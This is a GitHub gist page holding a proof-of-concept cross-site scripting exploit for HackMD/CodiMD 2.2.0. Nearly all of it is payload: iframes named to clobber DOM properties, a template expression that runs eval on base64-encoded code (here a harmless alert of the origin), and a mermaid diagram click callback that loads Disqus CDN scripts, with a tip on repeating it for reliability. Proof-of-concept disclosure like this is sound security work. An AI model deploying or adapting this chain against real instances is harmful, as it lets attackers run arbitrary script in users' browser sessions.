Last active
December 20, 2020 16:29
-
-
Save po6ix/f53ca885de0ab49fcc7651b3fa9e7b78 to your computer and use it in GitHub Desktop.
Hackmd/Codemi 2.2.0 XSS Poc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a> | |
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div> | |
* repeat below if you want to improve the reliability | |
```mermaid | |
graph LR; | |
A-->B; | |
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>" | |
``` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment